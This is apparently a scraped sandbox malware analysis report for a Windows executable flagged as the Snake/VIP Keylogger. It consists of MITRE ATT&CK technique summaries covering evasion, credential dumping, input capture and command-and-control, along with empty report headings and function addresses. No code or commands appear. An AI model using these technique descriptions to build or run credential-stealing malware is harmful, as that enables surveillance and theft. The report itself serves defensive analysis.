Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 114117914 - Rebound Electronics.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Gehman

C:\Users\user\AppData\Local\Temp\autA7C0.tmp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Windows Analysis Report
114117914 - Rebound Electronics.exe

Function 00C4B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00C23D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151
windowCOMMON

Function 00C3DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 00C2406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 00C6FA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238
COMMON

Function 00C23F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 00C6BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Function 00C23742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00C23E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Function 018CC2F0 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00C249FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Function 00C236B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 018CC0C0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 145
fileCOMMON

Function 00C251AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre